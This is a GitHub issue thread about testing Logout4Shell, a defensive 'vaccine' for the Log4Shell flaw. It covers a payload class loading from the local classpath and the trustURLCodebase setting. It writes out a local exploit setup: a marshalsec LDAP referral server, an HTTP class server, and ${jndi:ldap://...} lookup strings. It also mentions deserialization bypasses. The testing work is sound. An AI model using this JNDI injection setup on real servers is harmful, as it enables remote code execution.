### ISSUE TITLE
Java classfile HTTP server not being queried for payload classes

### ISSUE THREAD

**Issue by docprofsky** [Cybereason/Logout4Shell#20]
I was testing this demo and I noticed that the HTTP server responsible for providing the payload class file never receives a request for the class file, despite the LDAPRefServer responses pointing to the HTTP server.

The JNDI server is run with `java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCETransient"`. The HTTP server is run with `python -m http.server -b 127.0.0.1 --directory ../Logout4Shell/target/classes 8888

Running the demo vulnrable program with `java -cp /usr/share/java/log4j/log4j-core.jar:/usr/share/java/log4j/log4j-api.jar:target/classes/ Log4j` outputs
```
Setting FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS value to True
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by Log4jRCETransient (file:/home/schuyler/development/log4jgay/Logout4Shell/target/classes/) to field java.lang.reflect.Field.modifiers
WARNING: Please consider reporting this to the maintainers of Log4jRCETransient
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Lookup is an Interpolator - attempting to remove JNDI
22:37:01.712 [main] ERROR Log4j - ${jndi:ldap://127.0.0.1:1389/a}
22:37:01.764 [main] ERROR Log4j - ${jndi:ldap://127.0.0.1:1389/a}
```
Checking the LDAP server logs indicates that the vaccination did work as the LDAP server only sees one request.

-------

Upon further investigation, it appears that the payload is running from the classpath, and not from the HTTP server. Copying `Log4j.class` to a different directory from `target/classes/` and running it results in the payload not executing and no HTTP requests made to the server.
`cp target/classes/Log4j.class . && java -cp /usr/share/java/log4j/log4j-core.jar:/usr/share/java/log4j/log4j-api.jar:. Log4j`
results in
```
22:37:12.055 [main] ERROR Log4j - Reference Class Name: foo
22:37:12.093 [main] ERROR Log4j - Reference Class Name: foo
```
The LDAP server logs also show that two LDAP requests were made, which is not the expected result and implies that vaccination did not occur.

**Comment by Cybereason** [comment]
Hi.

You are correct. When testing the local vulnerable POC you need to move the the RCE classes out of the same library. Otherwise the JVM will load Log4jRCETransient.class from the local CLASSPATH.

In our testing, we move out all classes out of the target/classes folder before testing.

As for the payload not running locally, I assume you're using a version of java > 8u121.
The initial release of the log4j vulnerability suggested a mitigation that by default, on versions of java > 8u121 the setting for `com.sun.jndi.ldap.object.trustURLCodebase` was set to false, preventing JNDI to load classes from remote LDAP servers.

Unfortunately, the researcher community has since discovered this mitigation isn't sufficient, due to java serialization vulnerability - long story short - attacks can use existing classes that upon deserialization execute the malicious payload (look at https://github.com/pimps/JNDI-Exploit-Kit as examples).

In our testing, we simulate this situation by simply passing -Dcom.sun.jndi.ldap.object.trustURLCodebase=true to the java process - this simulates older versions of java as well as cases where the newly modified attack is used. 

TL;DR - the technique we use is the first discovered, which was thought to be mitigated by java > 8u121. It was since discovered that the mitigation is ineffective. 

Closing this for now, but please reopen if you we can further assist
